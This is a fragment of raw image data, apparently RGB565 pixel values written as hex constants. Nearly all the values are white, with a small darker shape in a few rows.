0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xe73c, 0x73ae, 0x7bef, 0xa534, 0xffff, 0xffff, 0x9492, 0x7bef, 0x8410, 0xdefb, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xd69a, 0xad55, 0xffff, 0x8410, 0xd69a, 0x9cd3, 0xbdf7, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xe71c, 0x8c71, 0xce59, 0x7bef, 0xffff, 0x7bcf, 0xf7be, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xdefb, 0x8410, 0xd69a, 0xf79e, 0xffff, 0x73ae, 0xef7d, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xd69a, 0x94b2, 0xffff, 0xffff, 0xffff, 0xd6ba, 0x6b4d, 0xb5b6, 0xb596, 0xe71c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7be, 0xef5d, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xc638, 0xc638, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 